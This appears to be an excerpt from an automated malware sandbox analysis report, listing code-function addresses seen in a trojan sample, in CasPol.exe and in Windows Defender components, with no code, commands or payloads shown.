Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10BF9	1_2_02A10BF9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11BF9	1_2_02A11BF9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A107C8	1_2_02A107C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A117CC	1_2_02A117CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C3D4	1_2_02A1C3D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A103D6	1_2_02A103D6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10FDA	1_2_02A10FDA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11729	1_2_02A11729
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10F2F	1_2_02A10F2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1872E	1_2_02A1872E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11B05	1_2_02A11B05
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A17F07	1_2_02A17F07
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10B0A	1_2_02A10B0A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1031D	1_2_02A1031D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A17B6D	1_2_02A17B6D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10B7C	1_2_02A10B7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10B49	1_2_02A10B49
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A18B53	1_2_02A18B53
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10757	1_2_02A10757
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11756	1_2_02A11756
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A108A7	1_2_02A108A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11CA9	1_2_02A11CA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C4B7	1_2_02A1C4B7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A118B8	1_2_02A118B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10CBB	1_2_02A10CBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A22C8B	1_2_02A22C8B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10096	1_2_02A10096
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1049B	1_2_02A1049B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A118E9	1_2_02A118E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A18CEF	1_2_02A18CEF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A108F4	1_2_02A108F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10CFA	1_2_02A10CFA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A188C2	1_2_02A188C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A104D1	1_2_02A104D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11CD9	1_2_02A11CD9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A100DA	1_2_02A100DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10421	1_2_02A10421
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10829	1_2_02A10829
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10C28	1_2_02A10C28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A18C2B	1_2_02A18C2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A18837	1_2_02A18837
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11839	1_2_02A11839
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10005	1_2_02A10005
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11804	1_2_02A11804
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11007	1_2_02A11007
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A23C0E	1_2_02A23C0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10014	1_2_02A10014
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A2401A	1_2_02A2401A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10060	1_2_02A10060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10C6C	1_2_02A10C6C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1086C	1_2_02A1086C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11C75	1_2_02A11C75
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1187C	1_2_02A1187C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1045B	1_2_02A1045B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A109A4	1_2_02A109A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10DAC	1_2_02A10DAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A175B1	1_2_02A175B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A119B6	1_2_02A119B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A101BA	1_2_02A101BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1BD88	1_2_02A1BD88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1018A	1_2_02A1018A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A18198	1_2_02A18198
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A189E3	1_2_02A189E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A109E2	1_2_02A109E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A175E7	1_2_02A175E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A119EA	1_2_02A119EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10DF2	1_2_02A10DF2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A101FC	1_2_02A101FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A105C2	1_2_02A105C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A171C4	1_2_02A171C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A171CD	1_2_02A171CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A171D3	1_2_02A171D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10930	1_2_02A10930
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10D33	1_2_02A10D33
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1010B	1_2_02A1010B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1050F	1_2_02A1050F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1191E	1_2_02A1191E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10D66	1_2_02A10D66
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1196D	1_2_02A1196D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1196F	1_2_02A1196F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1897B	1_2_02A1897B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1057C	1_2_02A1057C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1054C	1_2_02A1054C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1014F	1_2_02A1014F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1614E	1_2_02A1614E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A18154	1_2_02A18154
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1BD57	1_2_02A1BD57
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10959	1_2_02A10959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1D666B63	5_2_1D666B63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1D66A160	5_2_1D66A160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1D669890	5_2_1D669890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1D669548	5_2_1D669548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1D85EB58	5_2_1D85EB58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_1D85C408	5_2_1D85C408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_205FD148	5_2_205FD148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_205F1108	5_2_205F1108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_205FB2C0	5_2_205FB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_205F3378	5_2_205F3378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_205F4A88	5_2_205F4A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_205F4938	5_2_205F4938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_20616060	5_2_20616060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_20610040	5_2_20610040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_2061D170	5_2_2061D170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_206172D8	5_2_206172D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_2061D169	5_2_2061D169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_2061BA88	5_2_2061BA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_210B5B38	5_2_210B5B38
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4483728	7_2_00007FF6F4483728
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44786BC	7_2_00007FF6F44786BC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F447FF90	7_2_00007FF6F447FF90
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F448D038	7_2_00007FF6F448D038
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44E7600	7_2_00007FF6F44E7600
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44A15F8	7_2_00007FF6F44A15F8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44DF76C	7_2_00007FF6F44DF76C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44F77FC	7_2_00007FF6F44F77FC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F449A818	7_2_00007FF6F449A818
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44EB88C	7_2_00007FF6F44EB88C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44B490C	7_2_00007FF6F44B490C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F449B20C	7_2_00007FF6F449B20C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44EC21C	7_2_00007FF6F44EC21C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44BA288	7_2_00007FF6F44BA288
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4499278	7_2_00007FF6F4499278
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44A0320	7_2_00007FF6F44A0320
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44F837C	7_2_00007FF6F44F837C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44DE410	7_2_00007FF6F44DE410
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4471420	7_2_00007FF6F4471420
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44A6480	7_2_00007FF6F44A6480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44F2480	7_2_00007FF6F44F2480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4502504	7_2_00007FF6F4502504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F449C52C	7_2_00007FF6F449C52C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44E9520	7_2_00007FF6F44E9520
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F45034D4	7_2_00007FF6F45034D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44D1D78	7_2_00007FF6F44D1D78
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44EDD9C	7_2_00007FF6F44EDD9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44F1E00	7_2_00007FF6F44F1E00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44D2DD4	7_2_00007FF6F44D2DD4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44EBE48	7_2_00007FF6F44EBE48
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44D5ED0	7_2_00007FF6F44D5ED0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4481FA8	7_2_00007FF6F4481FA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F448DFB4	7_2_00007FF6F448DFB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F449FFA8	7_2_00007FF6F449FFA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44F5F9C	7_2_00007FF6F44F5F9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44EC034	7_2_00007FF6F44EC034
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44A502C	7_2_00007FF6F44A502C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F448EFCC	7_2_00007FF6F448EFCC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44D7050	7_2_00007FF6F44D7050
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44ED058	7_2_00007FF6F44ED058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44FB058	7_2_00007FF6F44FB058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44E7108	7_2_00007FF6F44E7108
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F447B0C8	7_2_00007FF6F447B0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44F1950	7_2_00007FF6F44F1950
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F447B944	7_2_00007FF6F447B944
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44ED9D0	7_2_00007FF6F44ED9D0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44A0AB0	7_2_00007FF6F44A0AB0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44EBA74	7_2_00007FF6F44EBA74
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F449AA68	7_2_00007FF6F449AA68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44E9B34	7_2_00007FF6F44E9B34
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44A1C10	7_2_00007FF6F44A1C10
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4493C87	7_2_00007FF6F4493C87
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44EBC60	7_2_00007FF6F44EBC60
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4479CFC	7_2_00007FF6F4479CFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F4491D00	7_2_00007FF6F4491D00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44ECCC8	7_2_00007FF6F44ECCC8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	Code function: 7_2_00007FF6F44A3CE0	7_2_00007FF6F44A3CE0
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Code function: 12_2_00007FF71C581DC4	12_2_00007FF71C581DC4
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Code function: 12_2_00007FF71C58435C	12_2_00007FF71C58435C
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Code function: 12_2_00007FF71C584D14	12_2_00007FF71C584D14
Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe	Code function: 12_2_00007FF71C5846B4	12_2_00007FF71C5846B4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39D9278	19_2_00007FF7D39D9278
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39C3728	19_2_00007FF7D39C3728
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39B86BC	19_2_00007FF7D39B86BC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39CD038	19_2_00007FF7D39CD038
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39C1FA8	19_2_00007FF7D39C1FA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39BFF90	19_2_00007FF7D39BFF90
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A434D4	19_2_00007FF7D3A434D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D3A42504	19_2_00007FF7D3A42504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe	Code function: 19_2_00007FF7D39B1420	19_2_00007FF7D39B1420
